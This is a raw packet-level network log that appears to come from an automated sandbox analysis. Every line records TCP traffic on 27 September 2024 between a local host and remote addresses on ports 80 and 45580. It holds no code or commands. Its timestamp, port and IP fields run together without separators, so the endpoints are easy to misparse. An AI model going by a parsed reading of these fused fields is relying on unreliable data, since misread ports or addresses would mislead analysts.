                                                                          Sep 27, 2024 04:21:17.784476042 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.784487009 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.784491062 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784503937 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784514904 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784524918 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784537077 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784552097 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.784552097 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.784554005 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784568071 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784585953 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784595013 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.784595966 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784599066 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.784607887 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784626007 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784631014 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.784645081 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784655094 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784667969 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.784672022 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784684896 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784688950 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.784698009 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784710884 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784722090 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784738064 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.784751892 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784763098 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.784764051 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784775972 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784785032 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784786940 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.784818888 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.784826994 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784845114 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784856081 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784868002 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784882069 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.784905910 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.784924984 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784936905 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784949064 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784960032 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784974098 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.785005093 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.785013914 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.785029888 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.785041094 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.785052061 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.785063028 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.785069942 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.785075903 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.785087109 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.785089970 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.785099030 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.785123110 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.785156965 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.785525084 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.785536051 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.785576105 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.786561012 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.786571026 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.786581993 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.786613941 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.786626101 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.786628008 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.786638975 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.786679983 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.787030935 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.787044048 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.787091017 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.818319082 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.818362951 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.818373919 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.818386078 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.818386078 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.818397999 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.818411112 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.818424940 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.818464994 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.818480968 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.818480968 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.818510056 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.820638895 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.820662975 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.820674896 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.820704937 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.820744038 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.820775986 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.820787907 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.820800066 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.820851088 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.820851088 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.825283051 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.825298071 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.825321913 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.825333118 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.825346947 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.825356960 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.825371027 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.825381041 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.825398922 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.825409889 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.825413942 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.825413942 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.825423956 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.825465918 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.825465918 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.825479031 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.825489998 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.825509071 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.825520039 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.825546026 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.825561047 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.825561047 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.825830936 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.826562881 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.826584101 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.826594114 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.826618910 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.826662064 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.826673031 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.826683998 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.826694965 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.826718092 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.826718092 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.826771021 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.826786041 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.826936007 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.827238083 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.827285051 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.827300072 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.827311993 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.827402115 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.827411890 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.827424049 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.827435970 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.827445984 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.827451944 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.827451944 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.827771902 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.827951908 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.827970982 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.827980995 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.827991962 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828010082 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828022003 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828032970 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828038931 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.828038931 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.828051090 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828064919 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828094959 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828107119 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828115940 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.828115940 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.828119993 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828170061 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.828170061 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.828212023 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828222990 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828236103 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828246117 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828284979 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.828284979 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.828510046 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828552008 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828568935 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828582048 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828593016 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828594923 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.828604937 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828654051 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.828654051 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.828695059 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828707933 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828720093 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828730106 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828741074 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828766108 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.828782082 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828792095 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828803062 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828811884 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.828814983 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828815937 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.828815937 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.828828096 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828840971 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828847885 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.828847885 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.828862906 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828867912 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.828876019 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828895092 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828905106 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828911066 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.828916073 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828927040 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828941107 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828957081 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.828968048 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.828975916 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828986883 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.828998089 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.829010010 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.829020977 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.829027891 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.829030991 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.829031944 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.829049110 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.829055071 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.829062939 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.829073906 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.829083920 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.829098940 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.829108953 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.829121113 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.829123974 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.829147100 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.829168081 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.829210043 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.829221010 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.829231977 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.829242945 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.829250097 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.829252958 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.829269886 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.829277039 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.829288006 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.829299927 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.829309940 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.829329014 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.829341888 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.829344988 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.829356909 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.829369068 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.829380035 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.829384089 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.829404116 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.829437971 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.829473972 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.829485893 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.829498053 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.829505920 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.829514980 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.829547882 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.829756021 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.829766989 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.829778910 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.829797029 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.829808950 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.829822063 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.829832077 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.829838037 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.829843998 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.829849005 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.829878092 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.829898119 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.843765020 CEST4971945580192.168.2.565.21.18.51
                                                                          Sep 27, 2024 04:21:17.848571062 CEST455804971965.21.18.51192.168.2.5
                                                                          Sep 27, 2024 04:21:17.854180098 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.854192972 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.854203939 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.854244947 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.854257107 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.854268074 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.854331017 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.854331017 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.854481936 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.854494095 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.854527950 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.854630947 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.856828928 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.856838942 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.856849909 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.856861115 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.856870890 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.856913090 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.856920958 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.856923103 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.856937885 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.856961012 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.856961012 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.857004881 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.857016087 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.857017994 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.857033014 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.857044935 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.857054949 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.857065916 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.857074976 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.857105017 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.857105017 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.857121944 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.857192993 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.857203007 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.857224941 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.857253075 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.857265949 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.857301950 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.857301950 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.857331038 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.857342005 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.857352972 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.857395887 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.857395887 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.871093988 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871113062 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871123075 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871150017 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.871179104 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.871190071 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871201038 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871232033 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.871248007 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871259928 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871284962 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.871315956 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.871360064 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871370077 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871392965 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871404886 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871404886 CEST4972280192.168.2.5185.215.113.17
